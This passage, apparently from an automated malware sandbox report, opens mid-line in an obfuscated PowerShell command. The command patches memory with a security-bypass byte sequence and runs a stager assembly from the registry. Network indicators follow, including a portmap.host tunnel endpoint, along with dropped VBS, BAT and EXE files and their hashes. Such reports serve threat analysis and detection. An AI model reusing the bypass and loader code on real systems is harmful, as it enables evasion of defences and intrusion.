ef]$UprnTBlnVv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$VTgUgtvVPMJtFwuIa,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uiGfRpGAzoYjWCjvT,$yGNuXBkrDmYeGzLzrrKQIW).Invoke($VTgUgtvVPMJtFwuIa,[uint32]8,0x20,[ref]$UprnTBlnVv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+'s'+'xrs'+'t'+''+'a'+'g'+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{44ee5488-4e53-4931-b851-64243896b9ac}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | runderscore00-63294.portmap.host | udp |
| DE | 193.161.193.99:63294 | runderscore00-63294.portmap.host | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.193.161.193.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ah2ichmp.2xy.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | a8641a2f94483f12ba0cad0cf02a3bc7 |
| SHA1 | fae3e6835336154b90503431279eef6c52a289d2 |
| SHA256 | ce70f1a4578b12964dde1e1eef8cb1948847230bf3458dfd41f8e2c32c71c24d |
| SHA512 | 5c92772168461d15ef6ed7b5ab2103cb63acfb1540d2d56610bbdd4a3494e866e47a225f6c7a42fa31f9170495dcddfad24533711289a6c3bfa5857a376b3e62 |
C:\Users\Admin\AppData\Roaming\Windows_Log_605.vbs
| MD5 | 22af76759682583a4b286a2166ec9c50 |
| SHA1 | 21593b845aa26231032b8ced8106efb2bda0b76a |
| SHA256 | 2c19089c8dc78c30ad2ee4b6886388522e88e13a225f8f8e3c80fcf4f25174cd |
| SHA512 | 949201b481a13d0ca0987e93ba0ddc4bd892e2e39f8e477ebad95969f3c0791fa2977d87edf1a3a656dfd1fc4697bd884c83cd962987c1dcd25984110689bf09 |
C:\Users\Admin\AppData\Roaming\Windows_Log_605.bat
| MD5 | d4c582bb5890af020c110f2b1de1d9db |
| SHA1 | 04c25b115c7bdaced94746c4acf9b5245f064ea0 |
| SHA256 | d34225f65c10acac82f381cf0f4281b2bc691afb2b72a1331acee94ca10e5c1c |
| SHA512 | 4b104fd0f62ecab38cc02b4cd77e6b8b5bcaaa3d98ad48f537fc7a67aa7d72d4575026921b63c9a743a41faaf3dd3154717bd6690f87dcb4114da05106b93012 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 801a886229d3c749abfa4dad18e58318 |
| SHA1 | 6720d751bc76febaff82068534364c9942040594 |
| SHA256 | 824bc6a9a47bdc85ee06f9dc03d986b35a1c97921550d58adc7f89c51725df40 |
| SHA512 | 37d578279f39434bf2b0592d04b8406b6718bcae0f4db590ba1ca8b1f5b8dd10541b37b3ee7099bf91234f5f75e0e1667ee54f5a89fc8acf8bc82baf05d738a4 |
C:\Users\Admin\AppData\Local\Temp\Install.exe
| MD5 | b489b7d9efc807fb9583f21f39327fc2 |
| SHA1 | 1ee42e6c08cd0a51d5c763c6b8771c004b962865 |
| SHA256 | 6f1bc33cba78e569e98566aa17be4a548c9ed1a6ea0f35a2149ad504def56579 |
| SHA512 | 53be2dc3574e1da8c643b24e6b982a19f6f2f4748acc38d5c625f66e701c1b4124156983c29668c8bed4c79b5f27d0f932c8a38ebecb33170c283f1161068c2e |